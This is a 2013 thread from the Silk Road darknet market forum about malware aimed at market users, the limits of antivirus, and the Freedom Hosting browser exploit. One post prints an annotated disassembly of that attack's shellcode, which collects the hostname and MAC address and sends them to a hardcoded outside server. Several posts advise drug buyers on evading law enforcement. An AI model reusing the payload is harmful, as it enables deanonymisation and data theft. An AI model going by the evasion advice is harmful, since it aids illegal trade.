Silk Road forums
Discussion => Security => Topic started by: astor on June 19, 2013, 02:16 am
-
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.
Remember when a bunch of people got messages on SR saying that someone had recorded them getting drugs out of their mailbox, and they could view the video on some site? The site had a Java app that turned out to be malware.
At the time, someone in our community clicked the Java app and got infected. He asked me what to do. I told him to format the hard drive and do a clean reinstall. He didn't listen to me, and instead spent 3 days removing the malware.
Or so he thought.
Today this person told me that he got the password reset for his SR account. I didn't know he had to reset his password, but he should have been suspicious from that alone, although he never mentioned it to me. When he logged in, all his BTC had been withdrawn. It was not a trivial amount of BTC. While talking to him, he rescanned his computer and found more malware. I experienced this myself when I infected a WinXP VM on purpose with the Trojan downloader on that site, "cleaned" it with an antivirus program, rebooted it and found the same rootkits.
Since the malware came from someone targeting SR users, he got infected with it, and his account was later compromised, it is very like this is the thing that stole his login credentials. He adamantly denies it could have been a phishing site or other things, but in my experience, when people are 100% sure about something, that it absolutely could not have been something, most of the time they are wrong.
Anyway, all this could have been avoided if he had done a clean reinstall.
-
Let me be more clear. You should make an actual disk, on read-only media, because a rescue partition can be infected too.
-
Er... well actually, that depends on your BIOS these days I believe. RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.
If you don't have a Windows 8 computer, you most likely do not have UEFI and/or SecureBoot. Note that I've never tested that SecureBoot really does work, but it *is* what they made it for (ostensibly), so I should hope it does...
Oh, yeah... as for Java: don't just disable it. If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit). BTW: how the Hell did a Java app execute from the Tor browser, anyway?
-
Er... well actually, that depends on your BIOS these days I believe. RootKits are nasty, don't get me wrong, but if you've got a newer BIOS that supports UEFI and SecureBoot... this scenario shouldn't be possible.
Yeah, that's true. Good point. Secure Boot should help.
Unfortunately, it's a pain for other reasons, like installing alternative operating systems. It also may not be turned on by default. I believe Microsoft only mandated it on devices with ARM processors (ie, running Windows RT). In other cases, the computer vendor is free to choose.
Oh, yeah... as for Java: don't just disable it. If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit). BTW: how the Hell did a Java app execute from the Tor browser, anyway?
Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.
-
Oh, I was in the chat with that guy. I didn't realize that he was one of the people that went to that URL.
Sucks :(
-
Like SS said, no Java in TorBrowser and JS can't deliver malware without the user clicking Run in a dialog. Lesson: People need to be mindful of what they are clicking.
Everyone should set their NoScript to NOT Allow Scripts Globally (this is the TBB default so if you haven't manually changed it you need to). Then enable it on trustworthy sites like the forums. SR itself does not require JS to function.
And since we are talking about potentially custom-created spyware/malware that targets SR users, reformatting/reinstalling is probably good advice.
-
Oh, yeah... as for Java: don't just disable it. If you don't actively use it, just outright uninstall the entire JRE or JDK (runtime environment / developer's kit). BTW: how the Hell did a Java app execute from the Tor browser, anyway?
Not sure. TorBrowser is supposed to be isolated to the folder it is extracted to, so it shouldn't know that Java is installed. That may only be the case for the Linux version.
To be exact, TBB should not be able to interact with the JVM/JRE without the Firefox/TBB Java plugin. This plugin should not be installed, nor should any.
For those that don't know, type this in your address bar:
about:plugins
There shouldn't be any plugins installed.
-
Oh right, I overlooked the obvious. Like a lot of people unfortunately, he probably copied the clearnet link to a regular browser.
-
most of this stuff is over my head, but I have a pretty good grasp of tor and pgp. I have recently been thinking about purchasing a cheap used laptop and just using it for usb-based VM platform tor browsing at public wifi spots. The problem is, no matter how secure you are technologically, the weakest link is the physical exchange of goods. You have to receive somewhere, on some regularity. Pattern recognition is how LE targets suspects, and unfortunately that's unavoidable.
Thoughts?
-
fartsinthewind, yeah receiving drugs is the riskiest part. Check out the SR Risk Analysis for Buyers thread, that's exactly what we're talking about there.
-
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.
In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mouses these days have their own CPU's and on board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
-
They're crap. They don't work. If you use Windows, you should make a rescue disk now, because if you get infected with malware, the only way to be sure you get rid of it is to format the hard drive and do a clean reinstall of the OS.
In the vast majority of cases you are correct, but technically even wiping the drive and doing a clean install of the OS is not enough to ensure you have removed all malware. In many cases it is possible for malware to infect your video card, your mouse, your keyboard and anything else that has reflashable or persistent memory on it. Some mouses these days have their own CPU's and on board memory! In such a case it is possible to have a totally cleaned drive and freshly installed OS, and to get reinfected via your infected peripherals and other hardware.
I'm not claiming that this isn't possible, but honestly if you aren't dealing with international espionage, nuclear secrets, and/or governments that buy up zero days like there's no tomorrow... I really, really don't think you have to worry about this. We have a lot of paranoid people about -- I personally don't feel that the vast majority of users should even consider this possibility (as in for most it's a level of paranoia that will hinder your safety, not help it)... but again, I'm not claiming this isn't possible and I don't really know how many people have instructions to build WMDs sitting around as icons on their desktop, so who knows... :)
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
Anything that actually modifies the state of the machine has the potential to be used as an exploit. You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing). It's not likely, of course, but it's possible. Whether you should worry about it or not depends on how badly you think they wanna catch you.
Do you make DPR look like Mother Theresa? Then yeah, I'd start worrying about it.
Not the kingpin of several international child slavery organizations? Eh, have a cup o' tea and relax a spell... :)
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
-
How in the hell do you make a rescue disk and wouldnt the recovery disk/drive be infected with the trojan/rootkit?
Mr.Black
-
It could be if you make the rescue disk after you are infected, but that's why you should make one right when you buy a new computer.
-
I fucking hate my life now....
Mr.Black
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
Anything that actually modifies the state of the machine has the potential to be used as an exploit. You don't always have to execute code or evaluate a script to get machine code loaded into main memory; just reading data from a site can be enough (i.e. buffer overrun kind of thing). It's not likely, of course, but it's possible. Whether you should worry about it or not depends on how badly you think they wanna catch you.
Do you make DPR look like Mother Theresa? Then yeah, I'd start worrying about it.
Not the kingpin of several international child slavery organizations? Eh, have a cup o' tea and relax a spell... :)
Apparently just visiting sites on the same server as CP is enough.
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
And once again how prescient that was.
In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.
Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
And once again how prescient that was.
In retrospect, this was the first remote execution vulnerability to be used against Tor users, it just wasn't as obvious because the people who got pwned copied the link into a regular browser.
Ironically, I used a disposable Win XP VM to look at and identify the malware in this case without getting pwned.
I have a contact who has been analyzing the malware, he tested it multiple times with Win XP and it was hit or miss in regards to if it worked or not. From an article I read from other hackers who analyzed it, some of it was specific to Windows 7, so on other versions of Windows it had a lower probability of actually working whereas on Windows 7 it had a high probability of working.
You really had to have the perfect storm of fuck ups to be compromised by this. Old version of Tor Browser, javascript enabled, on Windows and especially Windows 7, without isolation of the browser, without a VPN (although VPN would only help you somewhat), without firewall rules.
-
I'm sorry but you guys are 5-10 years behind where the bleeding edge of Malware is at the moment. And I'm not just talking about another fucking Slavik ZuESS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break windows update.
A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktard's like VUPEN selling exploit kits to LEA to target certain user's as I'm sure the FH job was done using a exploit kit made by a contractor.
-
I'm sorry but you guys are 5-10 years behind where the bleeding edge of Malware is at the moment. And I'm not just talking about another fucking Slavik ZuESS bot/trojan or some dumb Chinese APT threat. Go study the FLAME malware and you will understand how much of a beautiful piece of work it was, MD5 collision attack using new cryptographic attacks to break windows update.
A Java 0-day is simple compared to some of the attacks out there but unless you piss off a few certain people or a 3 letter agency you don't have much to worry about. What you do have to worry about is fucktard's like VUPEN selling exploit kits to LEA to target certain user's as I'm sure the FH job was done using a exploit kit made by a contractor.
We are 5-10 years behind or the feds are? If the NSA did this attack (and gave it their all) it would have found a way to fingerprint the OS people were using and target a specific payload to them, that then fingerprinted its environment to see if there was isolation or other security techniques, and then obtained other payloads to break through the isolation and disable each layer of security one at a time, prior to sending the information back to them. And it would have all been zero days, obfuscated and encrypted and probably never would have been detected in the first place.
The FBI used a month old javascript exploit to deliver a payload that was targeted specifically to Windows 7 and to a lesser extent Windows in general, and it didn't even attempt to break out of isolation or disable any security features. The NSA has fucking cyber missles essentially, they will blow their way through ten layers of isolation in the blink of an eye. The FBI has always used already patched exploits, I have never read of a case where they did an attack like this with an actual 0-day, let alone tried to break out of layers of security.
Chinese APT threat
A Chinese advanced persistent threat threat ;)?
-
A Chinese advanced persistent threat threat ;)?
yes yes yum cha malware
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.
Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.
Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???
The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
-
more specifically, here is the malware:
00000000 60 pusha
00000001 FC cld
00000002 E88A000000 call 0x91
00000007 60 pusha # win32 function resolver by @stephenfewer, used by Metasploit
00000008 89E5 mov ebp,esp
0000000A 31D2 xor edx,edx
0000000C 648B5230 mov edx,[fs:edx+0x30]
00000010 8B520C mov edx,[edx+0xc]
00000013 8B5214 mov edx,[edx+0x14]
00000016 8B7228 mov esi,[edx+0x28]
00000019 0FB74A26 movzx ecx,word [edx+0x26]
0000001D 31FF xor edi,edi
0000001F 31C0 xor eax,eax
00000021 AC lodsb
00000022 3C61 cmp al,0x61
00000024 7C02 jl 0x28
00000026 2C20 sub al,0x20
00000028 C1CF0D ror edi,0xd
0000002B 01C7 add edi,eax
0000002D E2F0 loop 0x1f
0000002F 52 push edx
00000030 57 push edi
00000031 8B5210 mov edx,[edx+0x10]
00000034 8B423C mov eax,[edx+0x3c]
00000037 01D0 add eax,edx
00000039 8B4078 mov eax,[eax+0x78]
0000003C 85C0 test eax,eax
0000003E 744A jz 0x8a
00000040 01D0 add eax,edx
00000042 50 push eax
00000043 8B4818 mov ecx,[eax+0x18]
00000046 8B5820 mov ebx,[eax+0x20]
00000049 01D3 add ebx,edx
0000004B E33C jecxz 0x89
0000004D 49 dec ecx
0000004E 8B348B mov esi,[ebx+ecx*4]
00000051 01D6 add esi,edx
00000053 31FF xor edi,edi
00000055 31C0 xor eax,eax
00000057 AC lodsb
00000058 C1CF0D ror edi,0xd
0000005B 01C7 add edi,eax
0000005D 38E0 cmp al,ah
0000005F 75F4 jnz 0x55
00000061 037DF8 add edi,[ebp-0x8]
00000064 3B7D24 cmp edi,[ebp+0x24]
00000067 75E2 jnz 0x4b
00000069 58 pop eax
0000006A 8B5824 mov ebx,[eax+0x24]
0000006D 01D3 add ebx,edx
0000006F 668B0C4B mov cx,[ebx+ecx*2]
00000073 8B581C mov ebx,[eax+0x1c]
00000076 01D3 add ebx,edx
00000078 8B048B mov eax,[ebx+ecx*4]
0000007B 01D0 add eax,edx
0000007D 89442424 mov [esp+0x24],eax
00000081 5B pop ebx
00000082 5B pop ebx
00000083 61 popa
00000084 59 pop ecx
00000085 5A pop edx
00000086 51 push ecx
00000087 FFE0 jmp eax
00000089 58 pop eax
0000008A 5F pop edi
0000008B 5A pop edx
0000008C 8B12 mov edx,[edx]
0000008E EB86 jmp short 0x16
00000090 skipping 0x1 bytes
00000091 5D pop ebp
00000092 81BDE90200004745 cmp dword [ebp+0x2e9],0x20544547 # "GET "
-5420
0000009C 7570 jnz 0x10e
0000009E 8D85D1020000 lea eax,[ebp+0x2d1] "ws2_32"
000000A4 50 push eax
000000A5 684C772607 push dword 0x726774c # LoadLibraryA
000000AA FFD5 call ebp
000000AC 85C0 test eax,eax
000000AE 745E jz 0x10e
000000B0 8D85D8020000 lea eax,[ebp+0x2d8] "IPHLPAPI"
000000B6 50 push eax
000000B7 684C772607 push dword 0x726774c # LoadLibraryA
000000BC FFD5 call ebp # ebp = find function
000000BE 85C0 test eax,eax
000000C0 744C jz 0x10e
000000C2 BB90010000 mov ebx,0x190
000000C7 29DC sub esp,ebx
000000C9 54 push esp
000000CA 53 push ebx
000000CB 6829806B00 push dword 0x6b8029 # WSAStartupA
000000D0 FFD5 call ebp
000000D2 01DC add esp,ebx
000000D4 85C0 test eax,eax
000000D6 7536 jnz 0x10e
000000D8 50 push eax
000000D9 50 push eax
000000DA 50 push eax
000000DB 50 push eax
000000DC 40 inc eax
000000DD 50 push eax
000000DE 40 inc eax
000000DF 50 push eax
000000E0 68EA0FDFE0 push dword 0xe0df0fea # WSASocketA
000000E5 FFD5 call ebp
000000E7 31DB xor ebx,ebx
000000E9 F7D3 not ebx
000000EB 39C3 cmp ebx,eax
000000ED 741F jz 0x10e
000000EF 89C3 mov ebx,eax
000000F1 6A10 push byte +0x10
000000F3 8DB5E1020000 lea esi,[ebp+0x2e1] # struct sockaddr_in { AF_INET, 80, 65.222.202.54 }
000000F9 56 push esi
000000FA 53 push ebx
000000FB 6899A57461 push dword 0x6174a599 # connect
00000100 FFD5 call ebp
00000102 85C0 test eax,eax
00000104 741F jz 0x125
00000106 FE8D89000000 dec byte [ebp+0x89] # Try to connect 5 times
0000010C 75E3 jnz 0xf1
0000010E 80BD4F02000001 cmp byte [ebp+0x24f],0x1
00000115 7407 jz 0x11e
00000117 E83B010000 call 0x257
0000011C EB05 jmp short 0x123
0000011E E84D010000 call 0x270
00000123 FFE7 jmp edi
00000125 B800010000 mov eax,0x100
0000012A 29C4 sub esp,eax
0000012C 89E2 mov edx,esp
0000012E 52 push edx
0000012F 50 push eax
00000130 52 push edx
00000131 68B649DE01 push dword 0x1de49b6 # gethostname
00000136 FFD5 call ebp
00000138 5F pop edi
00000139 81C400010000 add esp,0x100
0000013F 85C0 test eax,eax
00000141 0F85F2000000 jnz near 0x239
00000147 57 push edi
00000148 E8F9000000 call 0x246 # strlen of gethostname
0000014D 5E pop esi
0000014E 89CA mov edx,ecx
00000150 8DBDE9020000 lea edi,[ebp+0x2e9]
00000156 E8EB000000 call 0x246 # strlen (to move EDI to the NULL byte at the end of the HTTP string)
0000015B 4F dec edi
0000015C 83FA20 cmp edx,byte +0x20
0000015F 7C05 jl 0x166
00000161 BA20000000 mov edx,0x20
00000166 89D1 mov ecx,edx
00000168 56 push esi
00000169 F3A4 rep movsb
0000016B B90D000000 mov ecx,0xd
00000170 8DB5C4020000 lea esi,[ebp+0x2c4] "\r\nCookie: ID="
00000176 F3A4 rep movsb
00000178 89BD4B020000 mov [ebp+0x24b],edi
0000017E 5E pop esi
0000017F 56 push esi
00000180 68A9283480 push dword 0x803428a9 # gethostbyname
00000185 FFD5 call ebp
00000187 85C0 test eax,eax
00000189 0F84AA000000 jz near 0x239
0000018F 668B480A mov cx,[eax+0xa]
00000193 6683F904 cmp cx,byte +0x4
00000197 0F829C000000 jc near 0x239
0000019D 8D400C lea eax,[eax+0xc]
000001A0 8B00 mov eax,[eax]
000001A2 8B08 mov ecx,[eax]
000001A4 8B09 mov ecx,[ecx]
000001A6 B800010000 mov eax,0x100
000001AB 50 push eax
000001AC 89E7 mov edi,esp
000001AE 29C4 sub esp,eax
000001B0 89E6 mov esi,esp
000001B2 57 push edi
000001B3 56 push esi
000001B4 51 push ecx
000001B5 51 push ecx
000001B6 684872D2B8 push dword 0xb8d27248 # iphlpapi.dll!SendARP
000001BB FFD5 call ebp
000001BD 85C0 test eax,eax
000001BF 81C404010000 add esp,0x104
000001C5 0FB70F movzx ecx,word [edi]
000001C8 83F906 cmp ecx,byte +0x6
000001CB 726C jc 0x239
000001CD B906000000 mov ecx,0x6
000001D2 B810000000 mov eax,0x10
000001D7 29C4 sub esp,eax
000001D9 89E7 mov edi,esp
000001DB 89CA mov edx,ecx
000001DD D1E2 shl edx,1
000001DF 50 push eax
000001E0 52 push edx
000001E1 31D2 xor edx,edx
000001E3 8A16 mov dl,[esi]
000001E5 88D0 mov al,dl
000001E7 24F0 and al,0xf0 # It actually turns the raw data into hex strings before appending it to the HTTP header
000001E9 C0E804 shr al,0x4
000001EC 3C09 cmp al,0x9
000001EE 7704 ja 0x1f4
000001F0 0430 add al,0x30
000001F2 EB02 jmp short 0x1f6
000001F4 0437 add al,0x37
000001F6 8807 mov [edi],al
000001F8 47 inc edi
000001F9 88D0 mov al,dl
000001FB 240F and al,0xf
000001FD 3C09 cmp al,0x9
000001FF 7704 ja 0x205
00000201 0430 add al,0x30
00000203 EB02 jmp short 0x207
00000205 0437 add al,0x37
00000207 8807 mov [edi],al
00000209 47 inc edi
0000020A 46 inc esi
0000020B E2D4 loop 0x1e1
0000020D 59 pop ecx
0000020E 29CF sub edi,ecx
00000210 89FE mov esi,edi
00000212 58 pop eax
00000213 01C4 add esp,eax
00000215 8BBD4B020000 mov edi,[ebp+0x24b]
0000021B F3A4 rep movsb
0000021D C6854F02000001 mov byte [ebp+0x24f],0x1
00000224 E82E000000 call 0x257 # Append "Connection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n" and return the new strlen(ebp + 0x2e9)
00000229 31C0 xor eax,eax
0000022B 50 push eax
0000022C 51 push ecx
0000022D 29CF sub edi,ecx
0000022F 4F dec edi
00000230 57 push edi
00000231 53 push ebx
00000232 68C2EB385F push dword 0x5f38ebc2 # send
00000237 FFD5 call ebp
00000239 53 push ebx
0000023A 68756E4D61 push dword 0x614d6e75 # closesocket
0000023F FFD5 call ebp
00000241 E9C8FEFFFF jmp 0x10e
00000246 31C9 xor ecx,ecx
00000248 F7D1 not ecx
0000024A 31C0 xor eax,eax
0000024C F2AE repne scasb
0000024E F7D1 not ecx
00000250 49 dec ecx
00000251 C3 ret
00000252 0000 add [eax],al
00000254 0000 add [eax],al
00000256 skipping 0x1 bytes
00000257 8DBDE9020000 lea edi,[ebp+0x2e9]
0000025D E8E4FFFFFF call 0x246
00000262 4F dec edi
00000263 B94F000000 mov ecx,0x4f
00000268 8DB575020000 lea esi,[ebp+0x275]
0000026E F3A4 rep movsb
00000270 8DBDE9020000 lea edi,[ebp+0x2e9]
00000276 E8CBFFFFFF call 0x246
0000027B C3 ret
0000027C 0D0A436F6E or eax,0x6e6f430a
00000281 6E outsb
00000282 656374696F arpl [gs:ecx+ebp*2+0x6f],si
00000287 6E outsb
00000288 3A20 cmp ah,[eax]
0000028A 6B656570 imul esp,[ebp+0x65],byte +0x70
0000028E 2D616C6976 sub eax,0x76696c61
00000293 650D0A416363 gs or eax,0x6363410a
00000299 657074 gs jo 0x310
0000029C 3A20 cmp ah,[eax]
0000029E 2A2F sub ch,[edi]
000002A0 2A0D0A416363 sub cl,[0x6363410a]
000002A6 657074 gs jo 0x31d
000002A9 2D456E636F sub eax,0x6f636e45
000002AE 64696E673A20677A imul ebp,[fs:esi+0x67],dword 0x7a67203a
000002B6 69700D0A0D0A00 imul esi,[eax+0xd],dword 0xa0d0a
000002BD 83C70E add edi,byte +0xe
000002C0 31C9 xor ecx,ecx
000002C2 F7D1 not ecx
000002C4 31C0 xor eax,eax
000002C6 F3AE repe scasb
000002C8 4F dec edi
000002C9 FFE7 jmp edi
000002CB 0D0A436F6F or eax,0x6f6f430a
000002D0 6B69653A imul ebp,[ecx+0x65],byte +0x3a
000002D4 204944 and [ecx+0x44],cl
000002D7 3D7773325F cmp eax,0x5f327377
000002DC 3332 xor esi,[edx]
000002DE 004950 add [ecx+0x50],cl
000002E1 48 dec eax
000002E2 4C dec esp
000002E3 50 push eax
000002E4 41 inc ecx
000002E5 50 push eax
000002E6 49 dec ecx
000002E7 0002 add [edx],al
000002E9 0000 add [eax],al
000002EB 50 push eax
000002EC 41 inc ecx
000002ED DECA fmulp st2
000002EF 3647 ss inc edi
000002F1 45 inc ebp
000002F2 54 push esp
000002F3 202F and [edi],ch
000002F5 303563656134 xor [0x34616563],dh
000002FB 64652D39353164 gs sub eax,0x64313539
00000302 2D34303337 sub eax,0x37333034
00000307 2D62663866 sub eax,0x66386662
0000030C 2D66363930 sub eax,0x30393666
00000311 3535623237 xor eax,0x37326235
00000316 396262 cmp [edx+0x62],esp
00000319 204854 and [eax+0x54],cl
0000031C 54 push esp
0000031D 50 push eax
0000031E 2F das
0000031F 312E xor [esi],ebp
00000321 310D0A486F73 xor [0x736f480a],ecx
00000327 743A jz 0x363
00000329 2000 and [eax],al
0000032B 0000 add [eax],al
0000032D 0000 add [eax],al
0000032F 0000 add [eax],al
00000331 0000 add [eax],al
00000333 0000 add [eax],al
00000335 0000 add [eax],al
00000337 0000 add [eax],al
00000339 0000 add [eax],al
0000033B 0000 add [eax],al
0000033D 0000 add [eax],al
0000033F 0000 add [eax],al
00000341 0000 add [eax],al
00000343 0000 add [eax],al
00000345 0000 add [eax],al
00000347 0000 add [eax],al
00000349 0000 add [eax],al
0000034B 0000 add [eax],al
0000034D 0000 add [eax],al
0000034F 0000 add [eax],al
00000351 0000 add [eax],al
00000353 0000 add [eax],al
00000355 0000 add [eax],al
00000357 0000 add [eax],al
00000359 0000 add [eax],al
0000035B 0000 add [eax],al
0000035D 0000 add [eax],al
0000035F 0000 add [eax],al
00000361 0000 add [eax],al
00000363 0000 add [eax],al
00000365 0000 add [eax],al
00000367 0000 add [eax],al
00000369 0000 add [eax],al
0000036B 0000 add [eax],al
0000036D 0000 add [eax],al
0000036F 0000 add [eax],al
00000371 0000 add [eax],al
00000373 0000 add [eax],al
00000375 0000 add [eax],al
00000377 0000 add [eax],al
00000379 0000 add [eax],al
0000037B 0000 add [eax],al
0000037D 0000 add [eax],al
0000037F 0000 add [eax],al
00000381 0000 add [eax],al
00000383 0000 add [eax],al
00000385 0000 add [eax],al
00000387 0000 add [eax],al
00000389 0000 add [eax],al
0000038B 0000 add [eax],al
0000038D 0000 add [eax],al
0000038F 0000 add [eax],al
00000391 0000 add [eax],al
00000393 0000 add [eax],al
00000395 0000 add [eax],al
00000397 0000 add [eax],al
00000399 0000 add [eax],al
0000039B 0000 add [eax],al
0000039D 0000 add [eax],al
0000039F 0000 add [eax],al
000003A1 0000 add [eax],al
000003A3 0000 add [eax],al
000003A5 0000 add [eax],al
000003A7 0000 add [eax],al
000003A9 0000 add [eax],al
000003AB 0000 add [eax],al
000003AD 0000 add [eax],al
000003AF 0000 add [eax],al
000003B1 0000 add [eax],al
000003B3 0000 add [eax],al
000003B5 0000 add [eax],al
000003B7 0000 add [eax],al
000003B9 0000 add [eax],al
000003BB 90 nop
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.
Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???
The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.
In regards to the assembly code you quote. Where was this encoded in the script? Magneto?
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.
Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???
The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.
In regards to the assembly code you quote. Where was this encoded in the script? Magneto?
It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from a FBI server, the secondary payload could have been a program written in C, and after it downloaded it then it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do, javascript exploit to inject assembly code into the target computers memory and execute it, assembly code downloads secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so, and instead they just used an assembly program that gathers mac address and hostname and sends it to a server outside of Tor.
Yeah it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection then it could have been delivered by this attack as well, magneto would have just downloaded a secondary more complex compiled program and executed it.
-
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript can absolutely not be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript based.
-
JS can't deliver malware without the user clicking Run in a dialog
Javascript can be used to deliver malware via browser exploits.
True, doesn't seem to be the case here though.
Doesn't seem to be the case where? It just happened to anybody who visited any site hosted by freedom hosting.
The OP discusses malware downloaded via JAVA app exploit. A JS exploit did not seem to be the case based on the information provided in the OP. I stand by that statement.
Freedom hosting is a different story, obviously it was a js exploit but I've seen no evidence that there was malware delivered by javascript as you are contending. It was an exploit made possible by javascript. Where's the malware???
The malware is what gathered users hostname and MAC and sent it back to their server outside of Tor. It was delivered via a javascript exploit. They could have delivered any payload they wanted.
If malware is defined as any computer instruction code designed for a malicious purpose then sure, you can call that malware. It isn't possible for server-side javascript to execute a compiled piece of software locally without human interaction though.
In regards to the assembly code you quote. Where was this encoded in the script? Magneto?
It is entirely possible for server-side javascript to cause a compiled piece of software to be executed on a remote machine, via a browser exploit. This assembly code could have very well been used to download a secondary payload from a FBI server, the secondary payload could have been a program written in C, and after it downloaded it then it could have executed it and infected the system with a persistent backdoor. That is very common for hackers to do, javascript exploit to inject assembly code into the target computers memory and execute it, assembly code downloads secondary payload from the internet and executes it. The FBI didn't do that because they didn't need to and might have been restricted by the court from doing so, and instead they just used an assembly program that gathers mac address and hostname and sends it to a server outside of Tor.
It's important to remember that a javascript exploit would be needed for code execution in either case.
Yeah it was encoded in Magneto. I would call it malware because it compromised user security. I don't know what your definition of malware is, but if it requires a persistent infection then it could have been delivered by this attack as well, magneto would have just downloaded a secondary more complex compiled program and executed it.
The wikipedia definition of malware supports your definition.
Malware, short for malicious software, is software used or programmed by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems[1] . It can appear in the form of code, scripts, active content, and other software.[2] 'Malware' is a general term used to refer to a variety of forms of hostile or intrusive software.[3]
Just as a side discussion, I think it is kind of shocking how many javascript developers I meet who think that javascript can absolutely not be used to infect computers, that it is totally safe, cannot cause malware infections, etc. It is a really common belief apparently, and it is weird considering that an enormous number of the attacks against browsers are javascript based.
Very true. Javascript itself is the biggest security threat when using a web browser. All users should be blocking scripts, not just in TBB but in your normal web-browser as well.